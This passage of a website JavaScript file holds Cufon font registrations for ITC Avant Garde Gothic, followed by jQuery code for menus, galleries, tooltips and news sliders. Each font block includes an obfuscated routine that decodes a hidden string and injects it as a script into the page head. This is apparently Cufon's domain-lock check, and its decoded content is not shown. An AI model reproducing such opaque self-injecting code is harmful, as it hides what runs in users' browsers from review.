XW9El2HSu05^u~otP=I^XF`Fl2v^(=vUleAqHdPd759Ns$`G(ylSDo(didzSP!5U[29S[>>,cM[wJKiuWBN,~.qGp%msa!XUFE^S;dt)e1l3>0gH`y{bTr9v5jz(=7DP&2CI$okAD>9di!(d[1TSD.1di0vSl2`SP.=SgKrEm>yEgozNwryGi5INzryNXdSF7ryU!=o;KryUU=yN[>e")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":590,"face":{"font-family":"ITC Avant Garde Gothic Std Medium","font-weight":500,"font-stretch":"normal","units-per-em":"1000","panose-1":"2 11 6 2 2 2 2 2 2 4","ascent":"740","descent":"-260","x-height":"15","bbox":"-3 -811 925 268","underline-thickness":"50","underline-position":"-50","stemh":"97","stemv":"104","unicode-range":"U+0020-U+007E"}}));
	
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"401,80r0,134r-306,0r0,-954r306,0r0,134r-146,0r0,686r146,0","w":473},{"d":"638,-740r0,740r-158,0r0,-60v-16,23,-56,78,-168,78v-168,0,-278,-130,-278,-297v0,-188,134,-295,275,-295v98,0,145,48,163,66r0,-232r166,0xm481,-282v-2,-79,-62,-137,-140,-137v-96,0,-141,75,-141,140v0,85,61,142,139,142v80,0,144,-63,142,-145","w":698},{"w":309,"k":{"T":75,"V":100,"W":40,"Y":100,"A":30}},{"d":"350,-152v84,0,95,-68,94,-141r0,-447r189,0r0,447v0,124,-27,179,-74,227v-48,49,-115,80,-207,80v-54,0,-152,-13,-213,-79v-61,-67,-74,-119,-74,-228r0,-447r189,0r0,447v-1,67,17,141,96,141","w":698,"k":{",":20,".":20,"A":40}},{"d":"263,0r-247,-740r194,0r150,519r151,-519r195,0r-248,740r-195,0","w":722,"k":{"y":10,"G":45,"O":45,"u":60,",":145,".":145,"A":110,"a":101,"e":101,"o":101,"i":30,"-":75,"r":60,":":25,";":50}},{"d":"48,-465r504,0r0,160r-504,0r0,-160xm48,-201r504,0r0,160r-504,0r0,-160","w":600},{"d":"332,-419v-79,0,-133,62,-132,141v0,81,53,141,132,141v69,0,102,-40,120,-74r169,0v-30,126,-141,229,-291,229v-168,0,-297,-132,-297,-297v0,-163,127,-295,293,-295v147,0,266,97,294,233r-168,0v-18,-38,-51,-78,-120,-78","w":652,"k":{"y":20,",":15,"h":15,"k":15,"l":15}},{"d":"1,0r211,-297r-187,-258r199,0r90,146r89,-146r197,0r-187,258r215,297r-203,0r-111,-172r-113,172r-200,0","w":630,"k":{"a":40,"e":40,"o":40}},{"d":"60,0r0,-740r166,0r0,229v59,-63,138,-63,161,-63v116,0,273,83,273,293v0,200,-139,300,-280,300v-78,0,-138,-38,-161,-78r0,59r-159,0xm355,-136v85,0,139,-69,139,-143v0,-71,-54,-140,-136,-140v-88,0,-138,71,-138,140v0,77,52,143,135,143","w":693,"k":{"v":35,"y":20,",":10,".":10}},{"d":"25,-245r188,0v0,86,53,101,77,101v45,0,72,-37,72,-71v0,-39,-31,-51,-145,-99v-52,-21,-181,-73,-181,-212v0,-149,135,-228,259,-228v102,0,246,52,249,230r-187,0v-4,-25,-10,-72,-68,-72v-33,0,-65,23,-65,58v0,34,20,43,153,103v138,62,173,126,173,212v0,118,-62,237,-258,237v-194,0,-272,-114,-267,-259","w":573,"k":{",":-20}},{"d":"230,-740r284,451r-4,-451r181,0r0,740r-164,0r-283,-446r4,446r-181,0r0,-740r163,0","w":759},{"d":"855,-137r0,150v-14,1,-29,2,-47,2v-102,0,-154,-37,-174,-58v-86,53,-159,58,-208,58v-239,0,-391,-193,-391,-381v0,-194,150,-388,389,-388v239,0,395,189,395,378v0,123,-42,185,-61,214v23,21,53,25,97,25xm337,-436v112,0,215,87,273,154v12,-23,20,-56,20,-94v0,-131,-95,-212,-206,-212v-97,0,-175,68,-196,173v22,-7,60,-21,109,-21xm500,-166v-52,-76,-146,-135,-251,-99v47,100,153,138,251,99","w":866,"k":{",":-20}},{"d":"236,52v15,39,59,54,97,55v73,3,148,-55,135,-168v-19,32,-67,79,-154,79v-151,0,-280,-114,-280,-292v0,-190,136,-299,280,-299v62,0,123,22,155,70r0,-52r166,0r0,488v0,83,-5,136,-33,183v-42,70,-144,131,-281,131v-193,0,-266,-116,-277,-195r192,0xm469,-271v0,-84,-49,-147,-135,-147v-71,0,-134,57,-134,139v0,88,64,142,133,142v81,0,136,-56,136,-134","w":693},{"d":"241,0r-174,0r0,-740r253,0r139,477r135,-477r254,0r0,740r-174,0r6,-554r-160,554r-125,0r-160,-554","w":915},{"d":"183,-444r-124,0r0,-296r124,0r0,296","w":242},{"d":"199,-444r-124,0r0,-296r124,0r0,296xm388,-444r-124,0r0,-296r124,0r0,296","w":463},{"d":"67,0r0,-740r404,0r0,166r-215,0r0,126r207,0r0,166r-207,0r0,282r-189,0","w":506,"k":{",":162,".":129,"A":60,"a":20,"e":20,"o":20}},{"d":"43,264r0,-183v82,-35,185,-151,185,-327v0,-165,-95,-285,-185,-324r0,-184v261,84,365,323,365,510v0,186,-103,425,-365,508","w":473},{"d":"207,0r-191,-740r192,0r101,481r109,-481r145,0r109,483r101,-483r191,0r-196,740r-166,0r-113,-479r-111,479r-171,0","w":981,"k":{"y":40,"O":20,"u":50,",":106,".":106,"A":60,"h":15,"a":70,"e":70,"o":70,"i":15,"-":35,"r":40,":":20,";":40}},{"d":"381,-811r0,101v80,19,141,85,139,190r-155,0v0,-28,-15,-63,-55,-63v-34,0,-54,27,-54,56v0,51,47,69,135,103v124,47,147,140,147,192v0,84,-50,168,-157,207r0,101r-135,0r0,-101v-116,-17,-166,-119,-166,-199r171,0v0,38,23,71,59,71v34,0,57,-29,57,-59v0,-58,-75,-87,-141,-110v-54,-19,-140,-62,-140,-186v0,-123,84,-181,160,-202r0,-101r135,0"},{"d":"116,-740r409,0r0,159r-264,0r-16,101v20,-11,42,-22,100,-22v175,0,247,146,247,248v0,113,-85,269,-284,269v-159,0,-260,-96,-282,-213r190,0v17,23,48,46,87,46v54,0,100,-44,100,-98v0,-48,-35,-97,-101,-97v-37,0,-75,14,-97,64r-153,-38"},{"d":"483,-740r0,126r-55,0v-54,0,-58,38,-58,65r0,209v-1,95,-108,107,-108,109v35,2,108,19,108,92r0,212v0,27,4,65,58,65r55,0r0,126r-128,0v-78,0,-153,-42,-153,-138r0,-212v0,-55,-73,-61,-97,-61r0,-172v24,0,97,-7,97,-67r0,-216v5,-146,137,-143,281,-138","w":554},{"d":"15,0r0,-114r234,-315r-234,0r0,-126r413,0r0,126r-217,303r217,0r0,126r-413,0","w":444},{"d":"119,185r88,-213r-206,-527r177,0r113,322r106,-322r176,0r-278,740r-176,0","w":574,"k":{",":100,".":105,"a":30,"e":30,"o":30,"r":15}},{"d":"156,0r0,-574r-146,0r0,-166r480,0r0,166r-145,0r0,574r-189,0","w":499,"k":{"w":55,"y":15,"O":30,"u":46,",":82,".":100,"A":60,"a":70,"e":70,"o":70,"c":70,"-":75,"r":30,"s":40,":":20,";":29}},{"d":"500,125r-500,0r0,-50r500,0r0,50","w":500},{"d":"60,0r0,-555r155,0r0,59v19,-27,54,-78,153,-78v187,0,206,152,206,227r0,347r-166,0r0,-303v0,-61,-13,-115,-87,-115v-82,0,-95,59,-95,116r0,302r-166,0","w":632,"k":{"v":45,"y":30,"u":10}},{"d":"72,0r0,-740r189,0r0,574r219,0r0,166r-408,0","w":487,"k":{"y":40,"O":40,"T":50,"V":85,"W":55,"Y":85,"o":30}},{"d":"256,0r-189,0r0,-740r189,0r0,278r242,0r0,-278r189,0r0,740r-189,0r0,-296r-242,0r0,296","w":754},{"d":"186,-750r183,0r0,1000r-183,0r0,-1000","w":555},{"d":"87,0r0,-740r189,0r0,333r211,-333r198,0r-244,368r269,372r-230,0r-204,-320r0,320r-189,0","w":707,"k":{"y":50,"O":45,"u":40,"a":50,"e":50,"o":50}},{"d":"53,-524v-2,-153,123,-230,253,-230v144,0,232,98,232,202v0,102,-71,140,-98,155v139,47,139,154,139,179v0,129,-125,232,-274,232v-86,0,-183,-33,-231,-104v-33,-48,-38,-104,-41,-131r191,0v4,17,17,68,85,69v55,0,81,-36,81,-83v0,-70,-72,-75,-99,-75r-67,0r0,-139r32,0v17,0,93,0,93,-74v0,-32,-15,-65,-52,-65v-55,0,-57,46,-58,64r-186,0"},{"d":"638,-555r0,740r-166,0r0,-242v-21,26,-64,75,-170,75v-157,0,-268,-126,-268,-285v0,-192,127,-307,279,-307v108,0,152,60,166,80r0,-61r159,0xm478,-276v0,-79,-63,-143,-140,-143v-89,0,-138,72,-138,146v0,57,45,136,140,136v76,0,138,-62,138,-139","w":698},{"w":309,"k":{"T":75,"V":100,"W":40,"Y":100,"A":30}},{"d":"60,-614r0,-126r166,0r0,126r-166,0xm60,0r0,-555r166,0r0,555r-166,0","w":286},{"d":"459,-399r-163,0v-1,-12,-3,-42,-52,-42v-35,0,-47,22,-47,37v0,25,41,42,85,55v94,26,194,54,194,174v0,122,-103,194,-226,194v-84,0,-211,-38,-226,-184r165,0v7,51,56,51,63,51v28,0,58,-16,58,-43v0,-38,-40,-46,-147,-84v-71,-26,-132,-70,-132,-145v0,-115,100,-188,215,-188v73,0,199,29,213,175","w":499,"k":{"w":5,",":-5}},{"d":"574,-555r0,555r-155,0r0,-59v-19,27,-54,78,-154,78v-188,0,-207,-152,-207,-227r0,-347r166,0r0,303v0,61,13,115,88,115v83,0,96,-59,96,-116r0,-302r166,0","w":634},{"d":"320,-418v-76,0,-95,64,-94,123r0,295r-166,0r0,-555r155,0r0,59v19,-31,77,-78,155,-78v54,0,137,42,160,99v55,-97,217,-147,322,-43v54,53,60,92,60,215r0,303r-166,0r0,-295v1,-61,-11,-123,-85,-123v-74,0,-92,59,-92,115r0,303r-166,0r0,-302v1,-52,-15,-116,-83,-116","w":969,"k":{"y":30,"u":10}},{"d":"66,0r0,-429r-62,0r0,-126r62,0r0,-24v0,-161,119,-175,236,-175r0,125v-31,0,-70,0,-70,53r0,21r70,0r0,126r-70,0r0,429r-166,0","w":314,"k":{",":50,".":50,"a":20,"e":20,"o":20}},{"d":"33,-267r0,-206v0,-214,173,-281,279,-281v95,0,273,62,273,281r0,206v0,206,-157,281,-273,281v-109,0,-279,-72,-279,-281xm222,-478r0,216v0,44,14,110,87,110v87,0,87,-88,87,-110r0,-216v0,-23,0,-110,-87,-110v-75,0,-87,70,-87,110"},{"d":"66,0r0,-740r166,0r0,386r156,-201r197,0r-209,244r203,311r-188,0r-159,-267r0,267r-166,0","w":591,"k":{"y":20,"a":40,"e":40,"o":40}},{"d":"67,-740r242,0v137,0,187,22,228,54v115,89,107,296,9,390v-55,53,-160,69,-290,64r0,232r-189,0r0,-740xm443,-487v0,-96,-96,-87,-187,-87r0,176v93,1,187,10,187,-89","w":636,"k":{",":220,".":200,"A":90,"a":20,"e":20,"o":20}},{"d":"225,0r0,-581r-121,0r0,-159r310,0r0,740r-189,0"},{"d":"59,0r0,-555r156,0r0,62v16,-30,45,-81,141,-81r0,167v-87,-1,-132,29,-131,109r0,298r-166,0","w":363,"k":{"u":-10,",":75,".":80,"h":-10,"k":-10,"l":-10,"x":10,"a":15,"e":15,"o":15,"c":15,"d":15,"g":15,"i":-10,"m":-10,"n":-10,"p":-10,"q":15,"t":-20,"z":-10,"-":50}},{"d":"46,-330r508,-214r0,175r-340,117r340,115r0,175r-508,-214r0,-154","w":600},{"d":"244,-170r0,170r-173,0r0,-170r173,0","w":314,"k":{" ":150}},{"d":"0,-370r281,0r0,163r-281,0r0,-163","w":281},{"d":"248,-107r-34,107r-205,0r293,-740r163,0r284,740r-207,0r-35,-107r-259,0xm458,-257r-83,-258r-80,258r163,0","w":758,"k":{"v":70,"w":50,"y":68,"C":60,"G":60,"O":60,"Q":60,"T":60,"u":40,"U":40,"V":110,"W":60,"Y":100}},{"d":"333,17v-202,0,-299,-159,-299,-296v0,-135,97,-294,299,-294v202,0,299,159,299,295v0,136,-97,295,-299,295xm333,-418v-72,0,-133,59,-133,141v0,80,61,139,133,139v72,0,133,-59,133,-140v0,-81,-61,-140,-133,-140","w":666,"k":{"v":35,"w":30,"y":30,",":15,".":20,"x":40}},{"d":"72,100r265,-840r184,0r-264,840r-185,0","w":593},{"d":"72,214r0,-134r146,0r0,-686r-146,0r0,-134r306,0r0,954r-306,0","w":473},{"d":"216,-394v-98,0,-180,-80,-180,-181v0,-99,81,-180,180,-180v100,0,180,81,180,181v0,100,-81,180,-180,180xm216,-644v-38,0,-69,30,-69,71v0,36,31,68,69,68v36,0,69,-30,69,-70v0,-39,-31,-69,-69,-69xm642,15v-98,0,-181,-79,-181,-182v0,-99,81,-180,181,-180v99,0,180,81,180,181v0,101,-83,181,-180,181xm642,-236v-40,0,-70,32,-70,71v0,37,31,69,70,69v37,0,69,-31,69,-70v0,-40,-32,-70,-69,-70xm638,-740r-307,740r-115,0r306,-740r116,0","w":858},{"d":"341,0r0,-130r-326,0r0,-138r331,-472r176,0r0,462r82,0r0,148r-82,0r0,130r-181,0xm205,-278r148,0r0,-232"},{"d":"434,-231r-24,174r-113,0r24,-174r-78,0r-24,174r-114,0r24,-174r-99,0r15,-111r100,0r10,-73r-100,0r15,-111r100,0r22,-158r114,0r-22,158r78,0r22,-158r114,0r-22,158r111,0r-15,111r-112,0r-10,73r111,0r-15,111r-112,0xm337,-342r10,-73r-78,0r-10,73r78,0"},{"d":"177,0r-170,-555r172,0r85,345r91,-345r140,0r94,345r83,-345r171,0r-170,555r-154,0r-95,-359r-93,359r-154,0","w":850,"k":{",":90,".":90,"a":30,"e":20,"o":30}},{"d":"243,-170r-100,250r-137,0r64,-250r173,0","w":314,"k":{" ":150}},{"d":"230,0r0,-269r-221,-471r205,0r110,297r111,-297r203,0r-219,471r0,269r-189,0","w":647,"k":{"v":60,"O":65,"u":70,",":145,".":145,"A":100,"a":100,"e":100,"o":100,"i":25,"p":50,"q":100,"-":100,":":25,";":40,"S":20}},{"d":"424,14v-233,0,-389,-185,-389,-376v0,-242,186,-392,390,-392v228,0,391,178,391,384v0,206,-162,384,-392,384xm426,-588v-131,0,-202,112,-202,217v0,113,77,219,204,219v134,0,199,-122,199,-217v0,-96,-65,-219,-201,-219","w":851,"k":{"T":30,"V":45,"W":20,"Y":65,",":30,".":30,"A":60,"X":60}},{"d":"60,0r0,-740r166,0r0,740r-166,0","w":286},{"d":"339,-740v142,0,243,60,245,194v0,57,-26,115,-86,149v119,42,122,141,122,172v0,59,-27,120,-68,161v-96,94,-304,54,-485,64r0,-740r272,0xm403,-518v0,-72,-80,-53,-147,-56r0,115v69,-1,148,14,147,-59xm439,-237v0,-85,-103,-60,-183,-64r0,135v85,-2,183,17,183,-71","w":647,"k":{"U":10,"A":30}},{"d":"87,-614r0,-126r166,0r0,126r-166,0xm253,-555r0,543v0,129,-24,216,-206,216r-41,0r0,-126r22,0v58,0,59,-44,59,-84r0,-549r166,0","w":321},{"d":"603,-277r198,0v-43,175,-195,291,-374,291v-232,0,-390,-185,-390,-385v0,-189,146,-383,388,-383v232,0,356,179,376,295r-198,0v-21,-55,-77,-129,-179,-129v-127,0,-198,111,-198,216v0,112,76,220,199,220v118,0,166,-99,178,-125","w":832,"k":{"A":60}},{"d":"319,-418v-73,0,-93,56,-93,110r0,308r-166,0r0,-740r166,0r0,236v30,-50,86,-70,145,-70v271,0,190,324,203,574r-166,0r0,-302v1,-67,-21,-116,-89,-116","w":632,"k":{"y":30,"u":10}},{"d":"550,-435r175,0r-120,225r112,114r-113,111r-90,-93v-19,33,-79,93,-199,93v-165,0,-266,-95,-266,-215v0,-110,84,-167,137,-203v-52,-53,-70,-107,-70,-160v0,-108,91,-191,205,-191v114,0,194,82,194,182v0,97,-70,147,-102,170r82,83xm365,-573v0,-26,-15,-47,-44,-47v-21,0,-44,16,-44,49v0,35,25,62,42,80v22,-22,46,-46,46,-82xm405,-185r-117,-118v-24,19,-57,45,-57,86v0,47,40,73,89,73v48,0,72,-22,85,-41","w":758},{"d":"244,-555r0,170r-173,0r0,-170r173,0xm244,-170r0,170r-173,0r0,-170r173,0","w":314,"k":{" ":40}},{"d":"575,-555r-200,555r-159,0r-199,-555r172,0r107,346r107,-346r172,0","w":592,"k":{",":90,".":90,"a":35,"e":35,"o":35}},{"d":"430,-754r0,183v-82,35,-185,151,-185,327v0,165,95,285,185,324r0,184v-261,-84,-365,-323,-365,-510v0,-186,103,-425,365,-508","w":473},{"d":"252,-740r0,496r-171,0r0,-496r171,0xm252,-170r0,170r-171,0r0,-170r171,0","w":333},{"d":"65,-740r482,0r0,145r-260,595r-208,0r273,-581r-287,0r0,-159"},{"d":"60,185r0,-740r156,0r0,61v36,-42,91,-80,176,-80v197,0,271,173,271,302v0,160,-112,291,-270,291v-100,0,-147,-48,-167,-69r0,235r-166,0xm219,-276v0,78,61,140,139,140v87,0,139,-71,139,-142v0,-65,-48,-141,-139,-141v-80,0,-139,62,-139,143","w":697,"k":{"y":30,",":15,".":20}},{"d":"273,-740r219,0r-163,223v139,-15,271,66,271,249v0,169,-131,282,-287,282v-93,0,-177,-35,-229,-100v-94,-118,-70,-274,5,-384xm307,-353v-60,0,-100,46,-100,99v1,141,205,127,204,2v0,-48,-36,-101,-104,-101"},{"d":"11,0r259,-394r-229,-346r214,0r127,211r123,-211r213,0r-226,350r256,390r-214,0r-160,-262r-152,262r-211,0","w":759,"k":{"C":60,"O":60,"a":40,"e":40,"o":40}},{"d":"643,-555r0,555r-166,0r0,-60v-30,54,-99,79,-164,79v-176,0,-279,-138,-279,-297v0,-182,131,-296,279,-296v91,0,142,44,164,78r0,-59r166,0xm337,-419v-95,0,-137,80,-137,144v0,51,38,139,138,139v112,0,167,-108,125,-206v-16,-39,-56,-77,-126,-77","w":704},{"d":"603,-112r21,92v-100,36,-208,36,-232,36v-292,0,-395,-226,-395,-381v0,-199,152,-391,392,-391v210,0,354,146,354,328v0,145,-93,269,-196,269v-53,0,-83,-29,-98,-72v-83,145,-273,56,-273,-105v0,-104,78,-224,195,-224v54,0,88,28,99,59r10,-47r104,0r-44,266v-1,21,10,29,27,29v37,0,82,-77,82,-174v0,-140,-109,-238,-256,-238v-177,0,-294,148,-294,302v0,79,40,288,293,288v72,0,143,-12,211,-37xm358,-253v57,1,93,-63,92,-132v0,-36,-16,-81,-66,-81v-58,0,-101,63,-101,127v0,63,41,86,75,86","w":748},{"d":"46,-137r340,-117r-340,-115r0,-175r508,214r0,154r-508,214r0,-175","w":600},{"d":"67,0r0,-740r419,0r0,166r-230,0r0,115r223,0r0,166r-223,0r0,127r230,0r0,166r-419,0","w":528},{"d":"301,-583v-64,0,-68,46,-69,96r-183,0v-10,-159,104,-267,262,-267v156,0,240,113,240,212v0,92,-59,146,-113,196v-65,60,-74,80,-77,111r-174,0v1,-70,38,-113,104,-176v50,-49,68,-79,68,-110v0,-36,-17,-62,-58,-62xm361,-170r0,170r-174,0r0,-170r174,0","w":592},{"d":"67,0r0,-740r189,0r0,740r-189,0","w":323},{"d":"162,-839r242,128r-46,97r-247,-108","w":555},{"d":"71,-614r0,-126r128,0v78,0,153,42,153,138r0,216v0,60,73,67,97,67r0,172v-24,0,-97,6,-97,61r0,212v-5,146,-137,143,-281,138r0,-126r55,0v54,0,58,-38,58,-65r0,-212v1,-73,108,-94,108,-96v-35,-3,-108,-10,-108,-105r0,-209v0,-27,-4,-65,-58,-65r-55,0","w":554},{"d":"93,0r0,-429r-82,0r0,-126r82,0r0,-185r166,0r0,185r80,0r0,126r-80,0r0,429r-166,0","w":351,"k":{"a":20,"e":20,"o":20}},{"d":"67,0r0,-740r245,0v83,0,230,1,327,138v50,71,68,149,68,230v0,202,-100,372,-381,372r-259,0xm518,-369v0,-107,-37,-206,-180,-205r-82,0r0,408r81,0v141,0,181,-98,181,-203","w":742,"k":{"V":50,"W":25,"Y":60,",":45,".":45,"A":50}},{"d":"51,0r0,-147r199,-168v78,-65,129,-110,129,-190v0,-59,-34,-83,-79,-83v-65,0,-75,63,-76,117r-180,0v2,-48,4,-109,44,-170v63,-98,174,-113,228,-113v165,0,252,110,252,229v0,90,-27,155,-122,242r-136,124r263,0r0,159r-522,0"},{"d":"130,-407v-23,-19,-72,-59,-72,-142v0,-99,79,-205,251,-205v172,0,251,106,251,206v0,83,-49,122,-72,141v70,35,91,102,91,172v0,145,-111,249,-270,249v-159,0,-270,-104,-270,-249v0,-70,21,-137,91,-172xm309,-601v-36,0,-68,28,-68,69v0,39,32,67,68,67v36,0,68,-28,68,-68v0,-40,-32,-68,-68,-68xm309,-321v-107,3,-107,166,0,169v106,-3,107,-166,0,-169"},{"d":"595,-174v-47,108,-136,192,-271,192v-159,0,-294,-129,-294,-294v0,-155,122,-298,291,-298v186,0,320,172,288,354r-413,0v7,59,63,98,128,98v53,0,81,-23,101,-52r170,0xm198,-346r248,0v-4,-26,-38,-88,-124,-88v-86,0,-120,62,-124,88","w":646,"k":{"v":35,"w":20,"y":30,",":15,".":20,"x":40}},{"d":"244,-555r0,170r-173,0r0,-170r173,0xm244,-170r-110,250r-127,0r64,-250r173,0","w":314,"k":{" ":50}},{"d":"264,-152v51,2,58,-50,57,-94r0,-494r189,0r0,447v2,164,-23,206,-106,264v-44,31,-99,43,-149,43v-17,0,-212,0,-244,-195v-3,-18,-5,-37,-5,-57r201,0v3,42,9,84,57,86","w":578,"k":{"u":10,",":15,".":25,"A":40,"a":20,"e":20,"o":20}},{"d":"589,-492v-29,-53,-84,-96,-163,-96v-93,0,-202,69,-202,215v0,206,184,269,319,189v31,-18,51,-50,61,-86r-221,0r0,-151r439,0v4,53,-2,140,-34,212v-72,163,-238,224,-360,224v-224,0,-393,-175,-393,-388v0,-221,178,-381,396,-381v177,0,329,119,370,262r-212,0","w":854,"k":{",":20,".":20,"A":60}},{"d":"447,-468v0,-96,-89,-113,-191,-106r0,574r-189,0r0,-740v158,1,399,-11,471,53v59,52,90,121,90,202v0,113,-60,182,-133,213r153,272r-195,0r-193,-357v109,4,187,-9,187,-111","w":653,"k":{"O":5,"V":25,"W":5,"Y":25}},{"d":"483,-587r-236,421r236,0r0,166r-467,0r0,-124r255,-450r-255,0r0,-166r467,0r0,153","w":499},{"d":"43,-375r174,-365r166,0r174,365r-180,0r-78,-223r-77,223r-179,0","w":600},{"d":"347,0r-219,0r163,-223v-139,15,-271,-66,-271,-249v0,-169,131,-282,287,-282v93,0,177,35,229,100v94,118,70,274,-5,384xm311,-388v62,0,102,-46,102,-99v-1,-137,-205,-128,-204,-2v0,48,35,101,102,101"},{"d":"194,-375v66,0,155,68,213,68v40,0,65,-36,90,-70r36,158v-32,43,-65,88,-127,88v-80,0,-130,-68,-217,-68v-44,0,-68,36,-86,69r-36,-156v24,-44,60,-89,127,-89","w":600},{"d":"380,-506r0,173r172,0r0,160r-172,0r0,173r-160,0r0,-173r-172,0r0,-160r172,0r0,-173r160,0","w":600},{"d":"336,100r-264,-840r184,0r265,840r-185,0","w":593},{"d":"389,-740r-32,153r118,-103r52,94r-144,46r144,46r-56,98r-116,-106r34,152r-108,0r32,-154r-114,108r-56,-98r144,-48r-144,-44r52,-94r120,102r-34,-152r108,0","w":670}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+385-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("18kQFGY3,D{^1O=(%G6~989{MaYQkG{^Mag~,D`.kT+]sR3JDahnTTs{sB7J)3c`k33.MOg81TNbYMw}VT`uFbK9u!]RNTKQiWI7i8=R%DQGi8whiM9+5JQIFQPdMU)39BN]D){]hGmW,Os}%Jn7YB2aD862Cb)4UDI{%!h~p8)(Ub%UD=&cuJwNMO-J5.YPF8=31O9J1UKmCA2]NWQJ5.2]FWQP5GK=FG%3,OK.CD9^kJc.FH=P,Hi{VB3(,Ds-sJcd,R3dMJn4p.%B%QP^1A+-CRmJFa{R%8%~FBTPMOc^FObb5ab^%8TR2IOW!68H9g15iYpCh`UA)TDMsk,FN%Vun7JXb=G.-m:j]w^dPK~R3QaB&c}(+{x4%O7]FaY7%8=dFJc-FBY3FG6wkUbmkG{~1WwmC8P(1~wm1D%FsQwmMT3{N6wmMM3m1Obn")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":618,"face":{"font-family":"ITC Avant Garde Gothic Std Bold","font-weight":700,"font-stretch":"normal","units-per-em":"1000","panose-1":"2 11 8 2 2 2 2 2 2 4","ascent":"740","descent":"-260","x-height":"17","bbox":"-3 -839 964 265.655","underline-thickness":"50","underline-position":"-50","stemh":"155","stemv":"166","unicode-range":"U+0020-U+007E"}}));




jQuery.noConflict();

/*
 * General DOM ready statemenets
 */
jQuery(function($) {
	
	//IE6
	if (($.browser.msie) && ($.browser.version <= 6)) {
		$('#nav ul li:first-child').addClass('first-child');
		$('.box-long').hover( function(){ $(this).attr('id','over')}, function(){ $(this).removeAttr('id')});
	}
	$('#nav > li:last-child').addClass('last-child');
	
	//Animated Box
	$('.longbox').each(function(){
		var $button = $(this).find('.button div');
		$(this).mouseenter(function(){ if (!$button.is(':animated')) { $button.animate({ left: '-2' }); $button.addClass('animated'); }
		
		}).mouseleave( function(){ if ($button.is('.animated')) { $button.animate({ left: '-39' }); $button.removeClass('animated'); } });
	});
	
	//Short Animated Box
	$('.shortbox').each(function(){
		var $button = $(this).find('.button div');
		$(this).mouseenter(function(){ if (!$button.is(':animated')) { $button.animate({ left: '-4' }); $button.addClass('animated'); }
		
		}).mouseleave( function(){ if ($button.is('.animated')) { $button.animate({ left: '-23' }); $button.removeClass('animated'); } });
	});
	
	//Animate Submenu
	var $nav = $('#nav');
	$('> li', $nav).each(function(){
	  var $ul = $(this).find('ul');
	  var $siblings = $(this).siblings().find('ul');
	  if ($ul.length > 0) {
	    if ((!$(this).is('.active')) || (!$(this).is(':animated'))) {
	      $('>a',this).mouseenter(function(){
	        $ul.animate({ left: '0' });
	        $siblings.animate({ left: '-500' });
	      });   
	    }
	  }
	});
	
	var $navInactives = $('>li:not(".active") ul', $nav);
	var $navActive = $('.active ul', $nav);
	$('#nav').mouseleave(function(){
		$navInactives.animate({ left: '-500' });
		$navActive.animate({ left: '0' });
	});
	
	//Galleries
	$('#homephotos').galleryView({ panel_width: 958, panel_height: 298, frame_width: 62,frame_height: 62 });
	$('#photos').galleryView({ panel_width: 640, panel_height: 393, frame_width: 62,frame_height: 62 });
	$('#news-photos').galleryView({ panel_width: 369, panel_height: 236, frame_width: 62,frame_height: 62 });
	
	//tooltips
	$('#clients li').each(function(){
		$content = $(this).find('.content');
		if (!$content.is(':empty')){
	$(this).qtip({
	   content: $content,
	   show: { delay: 0, when: { event: 'mouseenter' } },
	   hide: { when: { event: 'mouseleave'} },
	   position: { 	target: 'mouse',
	   				adjust: { x: 10, y: -40 } 
	   			 }
	});
	}
	
	});
	
	//News cycle homepage
	$('.newsbox ul').cycle({
		fx:     'scrollUp', 
	    speed:  'fast', 
	    timeout: 3000, 
	    next:   '.next', 
	    prev:   '.prev'
	});
	
	//Cufon
	Cufon.replace('.csc-frame h1', { hover:true, fontFamily:'ITC Avant Garde Gothic Std Bold' })
	Cufon.replace('.csc-frame h2', { hover:true, fontFamily:'ITC Avant Garde Std Md' })
	Cufon.replace('.csc-frame p, #footer-right a', { hover:true, fontFamily:'ITC Avant Garde Std Bk' })
	
	//News Pager
	$('.list').each(function(){
		$list = $(this);
		$items = $('.item', $list);
		
		//Cycle
		$cases = $list.parent();
		$pager = $('.pages', $cases);
		$next = $('.next', $cases);
		$prev = $('.prev', $cases);
		$all = $('.all', $cases).text($items.length);
		var $active = $('.active', $cases).text($items.length);
		
		
		//Hide if less then 4 items
		if ($items.length<=4){
			$('.browseLinksWrap',$cases).hide();
		}
		
		index = 0;
		len = $items.length/4;
		while (index<len){
			$items = $('>.item', this);
			$list.append('<div class="group"></div>');
			$newItems = $items.slice(0,4).appendTo($('.group:last', $list));
			index++;
		}
		
		$list.cycle({
			fx:	'scrollLeft', 
			speed:  'fast', 
			timeout: 0, 
			pager:  $pager,
			next: $next,
			prev: $prev,
			after: function(currSlideElement, nextSlideElement, options, forwardFlag){
				nr = $(nextSlideElement).index()*4+$('.item', nextSlideElement).length;
				$active.text(nr);
			}
		});
		
	});

        //clientbox
        $('.clientBox').append('<div class="clientBoxBot"></div>');
        if($('.clientText')[0]){
		$('.clientText:eq(0), .clientText:eq(1)').equalHeight();
		$('.clientText:eq(3), .clientText:eq(4)').equalHeight();
		$('.clientText:eq(5), .clientText:eq(6)').equalHeight();
		$('.clientText:eq(7), .clientText:eq(8)').equalHeight();
		$('.clientText:eq(9), .clientText:eq(10)').equalHeight();
		$('.clientText:eq(11), .clientText:eq(12)').equalHeight();
		$('.clientText:eq(13), .clientText:eq(14)').equalHeight();
	}
	
});




